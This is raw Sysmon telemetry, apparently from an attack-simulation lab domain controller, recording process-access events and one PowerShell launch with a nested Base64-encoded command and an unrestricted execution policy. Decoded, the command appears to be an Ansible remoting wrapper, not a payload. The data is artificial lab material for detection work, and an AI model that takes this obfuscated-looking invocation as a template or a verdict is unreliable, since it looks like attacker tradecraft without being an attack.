13:54:39.490{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004312Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.475{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004311Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.475{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004310Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.475{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-859F-5FCF-D600-000000009101}4624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004309Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.475{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004308Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.475{10ACEC4A-859F-5FCF-D500-000000009101}41044804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-859F-5FCF-D600-000000009101}4624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66672516(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ad3987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b31e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b1534c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b072d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13804(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b133f7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65af9c52(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65af9222(wow64) 154100x80000000000000004307Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.489{10ACEC4A-859F-5FCF-D600-000000009101}4624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-859F-5FCF-CB41-080000000000}0x841cb0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-859F-5FCF-D500-000000009101}4104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000004306Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.428{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-859F-5FCF-D500-000000009101}4104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004305Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.428{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-859F-5FCF-D500-000000009101}4104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004304Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.396{10ACEC4A-859F-5FCF-D500-000000009101}4104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_fvm0jxbd.ir1.ps12020-12-08 13:54:39.396 10341000x80000000000000004303Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.381{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-859F-5FCF-D500-000000009101}4104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004302Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-859F-5FCF-D300-000000009101}50044516C:\Windows\system32\conhost.exe{10ACEC4A-859F-5FCF-D500-000000009101}4104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004301Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004300Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004299Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004298Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004297Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 